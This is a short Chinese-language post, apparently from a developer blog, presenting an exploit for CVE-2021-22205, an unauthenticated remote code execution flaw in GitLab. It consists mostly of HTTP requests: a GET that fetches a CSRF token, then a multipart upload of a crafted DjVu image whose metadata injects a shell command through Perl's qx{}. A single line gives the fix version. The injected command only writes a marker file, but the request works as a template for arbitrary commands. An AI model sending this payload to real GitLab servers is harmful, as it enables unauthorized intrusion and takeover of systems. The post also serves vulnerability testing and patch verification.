CVE-2021-22205 GitLab未授权 RCE

2021-11-05 10:35:18 浏览数 (2)

参考: https://hackerone.com/reports/1154542

获取X-CSRF-Token

代码语言:javascript复制
GET /users/sign_in

RCE

代码语言:javascript复制
POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM  疍JVMDIRM   .?    F   ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM   ^DJVUINFO   
   d  INCL   shared_anno.iff BG44    J  婃岜7?*? BG44   鶡BG44   
FORM  DJVIANTa  P(metadata
  (Copyright "
" . qx{echo vakzz >/tmp/vakzz} . 
" b ") )

修复建议:

GitLab 版本 13.10.3已修复更新

0 人点赞